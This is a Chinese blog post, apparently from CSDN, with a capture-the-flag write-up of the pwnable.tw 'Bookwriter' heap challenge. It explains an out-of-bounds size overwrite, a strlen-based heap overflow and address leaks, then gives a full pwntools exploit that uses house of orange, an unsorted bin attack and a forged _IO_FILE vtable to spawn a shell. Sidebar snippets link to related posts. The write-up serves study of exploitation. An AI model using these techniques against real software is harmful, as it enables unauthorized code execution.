【tw】Bookwriter

最新推荐文章于 2022-05-19 23:35:48 发布
最新推荐文章于 2022-05-19 23:35:48 发布
阅读量449 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/114529487
版权
程序&初步分析

程序会先向 bss 段中读取 0x40 字节的 author 信息:
在这里插入图片描述
存放 chunk ptr 和 size 的列表在其正下方:
在这里插入图片描述
在这里插入图片描述
看 add 功能中:
在这里插入图片描述
chunk_list 只有可以存放 8 个指针大小的内存,而 add 中 if 的判断条件显然可以多申请一个 chunk,而 size_list 紧随其后,可以溢出到此处。然后就是正常的读入数据。
view 功能正常,可以利用其泄漏 libc。
edit 功能存在一处漏洞:
在这里插入图片描述
这里首先通过先前存放的 size 进行读入数据,然后通过 strlen 函数重新计算长度,并更新。strlen 函数遇见 “\x00” 才会停止,并且不将 “\x00” 算入长度。,这里同样想到前面 add 功能中可以通过溢出修改 size [0] 为一个堆地址,则可以实现足够长度的堆溢出
info 功能通过 printf 进行打印:
在这里插入图片描述
因为存放 author 信息的内存和 chunk_list 紧挨,且不会在输入后添 0,所以通过该功能即可泄漏 heap_addr。
没有 free 功能,考虑 house of orange。

利用限制和条件
  • add 时 size 大小无限制
  • 通过数组越界实现几乎无限的堆溢出
  • 可泄漏 heap_addr、libc_addr
  • 可以 edit chunk
  • 无 free 功能
利用思路

由于没有 free 功能,所以考虑 house of orange,其结果是将 old chunk 放入 unsorted bin,而程序又有堆溢出可以修改到 unsorted bin 的 bk,所以继续结合 unsorted bin attack,unsorted bin attack 一个主要写堆地址的地方就是 _IO_list_all,完成 FSOP,通过 libc 2.23 下伪造 vtable 的方式,执行 system("/bin/sh\x00")。所以本题就采用这个思路。
注意到 info 功能中调用了 scanf 函数,此时其内部会申请一个 0x1000 大小的 chunk,利用这个机制,便可以将 old chunk 放入 unsorted bin 的同时泄漏 libc。
然后就是注意 add 第 9 个 chunk 前先将 #0 edit 为空,以通过 add 时的条件。
伪造的 fake_IO 如下:
在这里插入图片描述
满足条件后将 fp 置为 “/bin/sh\x00”,伪造 fake_vtable 指向 system 函数前,使 system 函数相对 vtable 的地址和 _IO_overflow 相对 vtable 的地址一样,最终执行 IO_overflow(fp, EOF) 时执行的即是 system("/bin/sh\x00"),本题的布置手法学自该文章

完整exp
from pwn import *
import sys

context.log_level = "debug"
elf = ELF("./bookwriter")

if sys.argv[1] == "p":
	p = process("./bookwriter")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	# libc = elf.libc
else:
	p = remote("chall.pwnable.tw", 10304)
	libc = ELF("./libc_64.so.6")
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


DEBUG = 0
if DEBUG:
	gdb.attach(p, 
	'''	
	b *0x08048935
	c
	''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

# if sys.argv[1] == "process":
#    one_gadget = libc_base + 0xf02a4
# else:
#    one_gadget = libc_base + 0xef6c4

menu = "Your choice :"
def cmd(idx):
	ru(menu)
	sl(str(idx))

def add(size, content):
	cmd(1)
	ru("Size of page :")
	sl(str(size))
	ru("Content :")
	se(content)

def view(idx):
	cmd(2)
	ru("Index of page :")
	sl(str(idx))

def edit(idx, content):
	cmd(3)
	ru("Index of page :")
	sl(str(idx))
	ru("Content:")
	se(content)

def info1():
	cmd(4)
	
author = "a"*(0x40-0x2) + "||"
ru("Author :")
se(author)

add(0x28, "0") # 0
edit(0, 0x28 * 'a')
edit(0, 0x28 * 'a' + '\xd1\x0f\x00')

info1() #info
ru("||")
heap_base = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00")) - 0x10 # 直接接收 8 字节
print("heap_base:", hex(heap_base))
sla("(yes:1 / no:0)", "0\n")

edit(0, '\x00') # size[0] = 0
for i in range(8):
	add(0x28, 'a'*8)

view(2)

ru("aaaaaaaa")
libc_base = u64(ru("\x7f")[-6:].ljust(8, '\x00')) - 0x68 - libc.symbols['__malloc_hook']
info("libc_base", libc_base)
system = libc_base + libc.symbols['system']
IO_list_all = libc_base + libc.symbols["_IO_list_all"]
# # IO_str_jumps = libc_base + libc.symbols["_IO_str_jumps"]
# # IO_str_jumps = libc_base + 0x3c37a0

pl = '\x00' * 0x1a0
fake_IO_file = "/bin/sh\x00" + p64(0x61) + p64(libc_base) + p64(IO_list_all - 0x10)
fake_IO_file += p64(2)+p64(3)+p64(0)*9+p64(system) + p64(0)*11 + p64(heap_base+0x210)
pl += fake_IO_file
edit(0, pl)
sleep(0.5)

cmd(1)
ru("Size of page :")
sl(str(0x10))

ia()

在这里插入图片描述

、皮皮鸭
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
bookwriter005
05-01
《认知写作学学习笔记》是关于提升写作技巧和理解写作本质的一份宝贵资料。这份笔记主要涵盖了五个核心主题,旨在帮助读者深入理解“文气”、“逻辑”、“文采”和“故事”,并以“结业大作业”作为实践应用的总结。...
透过bookwriter学习top chunk和_IO_FILE利用
极目楚天舒的博客
04-23 1045
前一段时间研究了著名的house_of_orange,于是趁热打铁赶紧做了一道类似的题目bookwriter以巩固姿势。0x01题目分析程序行为:输入作者名字、添加、查看书页内容、编辑、查看信息。Add函数如下,作用是为每个page分配内存并将堆地址存放在全局数组heap_address,同时全局数组size存放了对应page的大小,size控制着每次edit输入内容的大小,因此要成功溢出必须覆盖...
python 根据jinjia模板写excle
浮云
05-19 2108
python 更具jinjia 模板写excel文件,需要安装python 的一个包。 pip install xlsxtpl 写excle 模板,jinjia 语法。 代码如下: import os from datetime import datetime from xlsxtpl.writerx import BookWriter def write_test(): pth = os.path.dirname(__file__) fname = os.path.join(pth.
Pwnable.twBookWriter
Bill
05-11 724
Pwnable.twBookWriter 知识点     FSOP是FILE Stream Oriented Programming的缩写, 进程内所有的_IO_FILE结构会使用_chain域相互连接成一个链表, 这个链表的头部由_IO_list_all维护.     FSOP的核心思想就是劫持...
python处理xlsx模板_GitHub - Gaoshimin/python-xls-xlsx-template: A python module to generate xls/x files ...
weixin_35970228的博客
12-23 1214
xltpl使用 xls/x 文件作为模板来生成 xls/x 文件。xltpl 是 xlstpl 和 xlsxtpl 合体。实现方法xltpl.writer 使用 xlrd 来读取 xls 文件,使用 xlwt 来写入 xls 文件。xltpl.wirterx 使用 openpyxl 来读写 xlsx 文件。xltpl 读取 xls/x 文件时,会为每个工作表创建一棵树。然后,它将树转换为带有自定义...
微软Win10自带代码编辑器《Code Writer》使用方法、介绍和常见问题
热门推荐
songguolin的博客
05-02 7万+
今天刚刚安装完win10发现,原来自带一款代码编辑器《Code Writer》,使用了一下发现,这个软件非常好用,界面简洁,常用的功能基本都有,感觉再也不用第三方代码编辑器了。 一、Code Writer 介绍 《Code Writer》是一款免费的文本和代码编辑器应用程序,具有主动语法高亮显示,可以在编辑文档时更新,并支持超过20种文件类型。选项卡式文档界面允许在打开的文档之
图书馆借阅系统数据库设计.doc
10-03
+ 图书:BookID, BookNo, BookName, BookWriter, BookPublish, BookDate, BookClass, BookState, BookRNo + 读者:ReaID, ReaName, ReaSex, ReaNo, ReaLBID, ReaDep, ReaGrade, ReaPref, ReaDate, Reasx + 管理员...
C#查询图书的存储过程
10-10
首先,我们来看一下提供的存储过程`select_book`,它的主要目的是根据书名(`bookName`)、作者(`bookWriter`)和出版社(`bookPublish`)来筛选图书信息。存储过程的定义如下: ```sql Create procedure select_...
试验5 sql语句练习——图书馆数据库答案.docx
12-06
SELECT bookId, bookName, bookWriter, bookPublish, (bookPrice*0.8) AS 打折价 FROM book; SELECT DISTINCT readerId FROM reader; ``` 八、学会使用企业管理器创建数据库和表 使用企业管理器可以创建数据库和表...
【pwn】orw
weixin_43960998的博客
06-19 1777
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1305
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 677
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 541
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
【kernel pwn】(壹)初探
weixin_43960998的博客
03-18 512
1.环境搭建 只需要安装一个qemu就好了: sudo apt-get install qemu 2.准备工作 一般kernel题目会给一些文件,分别是boot.sh,bzImage,rootfs.cpio,分别是启动脚本,内核映像,根文件系统映像。题中所给的 rootfs.cpio 一般先是一个压缩包,需要重命名后解压出真正的文件目录,这里参考 cnitlrt师傅的文章给出一些常用脚本: 首先是解包脚本: #!/bin/bash mv $1 $1.gz unar $1.gz mv $1 core mv
【笔记】pwn模板
weixin_43960998的博客
02-21 511
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
【BUU】n1ctf2018_null
weixin_43960998的博客
04-12 497
struct malloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets su
【pwn】2019Byte ctf 复现
weixin_43960998的博客
07-07 472
1、mulnote 看 wp 说加了 ollvm 混淆,不过影响不大, 存在 uaf,libc 2.23,double free 梭了。 from pwn import * import sys binary = "./pwn" context.log_level = "debug" context.binary = binary context.arch = "amd64" elf = ELF(binary) local = 1 if local: p = process(binary)
【攻防世界】secret_file
weixin_43960998的博客
03-28 461
1.程序逆向 感觉这题的绝大部分难度在逆向上,可以逆个大概然后动调就ok了。 刚一看到有点懵,直接看看让干什么:     最终需要我们满足 v15 和 v17 的值相等。     往前找看看 v15 和 v17 分别是什么。通过在栈中的关系看到,v15 在第一个函数里面进行了赋了一个 hash 值: 此后再也没变过。再看 v17: DD0函数做了一个 SHA256,结果应该是存放在了 v16 中, 然后把结果的每个字符转
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> </head> <body> <div id="app"> <el-button type="primary" @click="addRequest">添加</el-button> <el-input v-model="bookname" placeholder="请输入内容"></el-input> <el-input v-model="bookIsbn" placeholder="请输入内容"></el-input> <el-input v-model="bookPrice" placeholder="请输入内容"></el-input> <el-input v-model="bookWriter" placeholder="请输入内容"></el-input> </div> <script src="https://cdn.bootcdn.net/ajax/libs/vue/2.7.0/vue.js"></script> <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.4/jquery.js"></script> <!-- 引入样式 --> <link rel="stylesheet" href="https://unpkg.com/element-ui/lib/theme-chalk/index.css"> <!-- 引入组件库 --> <script src="https://unpkg.com/element-ui/lib/index.js"></script> <script> let MyVue = new Vue({ el: '#app', data() { return { bookname: "114514", bookIsbn: "114514", bookPrice: "114514", bookWriter: "114514" } }, methods: { addRequest: () => { $.ajax({ url: "http://localhost:8080/bookAdd", method: "POST", contentType: 'application/x-www-form-urlencoded', data: { bookname: this.$data.bookname, bookIsbn: this.$data.bookIsbn, bookPrice: this.$data.bookPrice, bookWriter: this.$data.bookWriter }, success: (res) => { console.log(JSON.parse(res)); } }) } } }) </script> </body> </html>获取data内元素请帮我改正
最新发布
06-03
您的代码中有一处错误,就是在`addRequest`方法中使用了箭头函数,导致`this`指向的是全局对象,而不是Vue实例。因此,在获取`bookname`、`bookIsbn`、`bookPrice`和`bookWriter`数据时,会出现错误。 可以将箭头函数改为普通函数,或者使用ES6的`bind`方法将`this`绑定到Vue实例上。以下是一种修改方式: ``` let MyVue = new Vue({ el: '#app', data() { return { bookname: "114514", bookIsbn: "114514", bookPrice: "114514", bookWriter: "114514" } }, methods: { addRequest: function() { $.ajax({ url: "http://localhost:8080/bookAdd", method: "POST", contentType: 'application/x-www-form-urlencoded', data: { bookname: this.bookname, bookIsbn: this.bookIsbn, bookPrice: this.bookPrice, bookWriter: this.bookWriter }, success: (res) => { console.log(JSON.parse(res)); } }) } } }) ``` 在`addRequest`方法中,使用普通函数来定义,这样`this`指向的就是Vue实例。同时,在发送Ajax请求时,将`data`数据中的`this.$data`改为`this`,这样就可以正确获取`bookname`、`bookIsbn`、`bookPrice`和`bookWriter`等数据了。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值